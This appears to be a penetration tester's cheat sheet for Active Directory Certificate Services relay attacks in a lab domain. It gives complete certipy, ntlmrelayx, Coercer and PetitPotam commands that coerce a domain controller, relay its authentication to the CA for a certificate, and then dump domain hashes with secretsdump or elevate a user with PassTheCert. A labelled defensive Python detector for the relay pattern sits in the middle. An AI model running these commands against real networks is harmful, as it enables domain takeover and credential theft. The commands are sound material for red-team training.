Do the check:
certipy find -username fcastle@Marvel.local -password Password1 -dc-ip 192.168.218.136 -stdout -debug -scheme ldap
Host on NTLMRelayx:
sudo impacket-ntlmrelayx -t "http://CA01.domain.com/certsrv/certfnsh.asp" --adcs -smb2support --template DomainController
Host certipy relay (preferred):
sudo certipy relay -target 'http://CA01.domain.com' -template DomainController -debug
-t (ntlmrelayx) / -target (certipy relay) is the CA's DNS name or FQDN.
If you're going to coerce the DC to authenticate to you, you need -template DomainController.
Coercer (to coerce the DC into authenticating to your hosted certipy/ntlmrelayx server):
/root/.local/bin/coercer coerce -t dc.ip.goes.here -u 'User' -p 'Password' -d domain.com -l kali.machine.ip.here
Sometimes Coercer returns an error about getting back 2 values; if that happens, other coercion methods will still work (try PetitPotam).
PetitPotam:
python3 PetitPotam.py -u 'user' -p 'password' -d domain.com kali.ip.goes.here dc.ip.goes.here
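From the defending side, the coercion step above leaves a distinctive trace on the CA host: the domain controller's machine account (e.g. DC01$) performs an NTLM network logon from an address that is not the DC's own. The following is an added detection example, not part of these notes or of any of the tools named here; the field names follow Windows Security event 4624, while the event lines, the DC inventory and the addresses are constructed sample data.

```python
# Added example (not from the original notes): flag the authentication pattern
# that coercion-plus-relay produces on the CA host. A DC's machine account
# should only ever authenticate from the DC's own address; an NTLM network
# logon (LogonType 3) of that account arriving from any other IP is the relay,
# seen from the CA's side.
#
# Field names follow Windows Security event 4624 (TargetUserName, LogonType,
# AuthenticationPackageName, IpAddress, WorkstationName). Everything else
# below (events, inventory, addresses) is constructed sample data.

from dataclasses import dataclass
from typing import Dict, List, Optional
import re

# Constructed inventory: DC machine accounts and the addresses they are
# expected to log on from (assumption; fill from your own environment).
DC_ACCOUNTS: Dict[str, set] = {
    "DC01$": {"192.168.218.136"},
}

# Constructed 4624/4625 records in a flat key=value form, one event per line.
SAMPLE_EVENTS = """\
EventID=4624 TargetUserName=fcastle TargetDomainName=MARVEL LogonType=3 AuthenticationPackageName=NTLM IpAddress=192.168.218.150 WorkstationName=WS01
EventID=4624 TargetUserName=DC01$ TargetDomainName=MARVEL LogonType=3 AuthenticationPackageName=Kerberos IpAddress=192.168.218.136 WorkstationName=DC01
EventID=4624 TargetUserName=DC01$ TargetDomainName=MARVEL LogonType=3 AuthenticationPackageName=NTLM IpAddress=192.168.218.200 WorkstationName=KALI
EventID=4625 TargetUserName=DC01$ TargetDomainName=MARVEL LogonType=3 AuthenticationPackageName=NTLM IpAddress=192.168.218.200 WorkstationName=KALI
"""


@dataclass
class Finding:
    account: str
    source_ip: str
    workstation: str
    reason: str


_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value event line (constructed format) into a dict."""
    return dict(_KV.findall(line))


def is_suspicious(ev: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when a DC machine account used NTLM from a non-DC address."""
    # Only successful network logons matter; 4625 failures are noise here.
    if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
        return None
    acct = ev.get("TargetUserName", "")
    if acct not in DC_ACCOUNTS:
        return None
    # Kerberos logons from the DC itself are normal; NTLM is the tell.
    if ev.get("AuthenticationPackageName") != "NTLM":
        return None
    src = ev.get("IpAddress", "")
    if src in DC_ACCOUNTS[acct]:
        return None
    return Finding(
        acct, src, ev.get("WorkstationName", ""),
        "DC machine account NTLM network logon from unexpected source "
        "(possible authentication coercion + relay)",
    )


def scan(log_text: str) -> List[Finding]:
    """Run the check over every non-empty line of a log dump."""
    events = (parse_event(l) for l in log_text.splitlines() if l.strip())
    return [f for f in map(is_suspicious, events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[!] {f.account} from {f.source_ip} ({f.workstation}): {f.reason}")
```

On the sample data only the third line fires: the user logon is not a DC account, the Kerberos logon from the DC's own address is expected, and the 4625 failure is skipped. In practice the same rule is worth running on the CA server, on the DC itself, and on any host that exposes an NTLM-authenticated HTTP endpoint.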
Use the retrieved cert:
certipy auth -pfx machineAccount.pfx -dc-ip 192.168.218.136 -username machineAccount -domain Marvel.local
The most realistic thing to do here is a secretsdump using the NT hash you get from the previous command.
User NTLM:
secretsdump.py administrator:@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
Machine (like DC01$):
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
secretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'
secretsdump.py -hashes :e52cac67419a9a224a3b108f3fa6cb6d -just-dc-ntlm 'MARVEL/dc01$@dc01.marvel.local'
PassTheCert:
Create crt and key from pfx:
certipy cert -pfx "PATH_TO_PFX_CERT" -nokey -out "user.crt"
certipy cert -pfx "PATH_TO_PFX_CERT" -nocert -out "user.key"
Pass:
passthecert.py -action modify_user -crt "PATH_TO_CRT" -key "PATH_TO_KEY" -domain "domain.local" -dc-ip "DC_IP" -target "SAM_ACCOUNT_NAME" -elevate
If you get a 403 or 404 in the relay, it likely means the HTTP version of the CA web enrollment page is enabled but HTTPS is the one actually in use.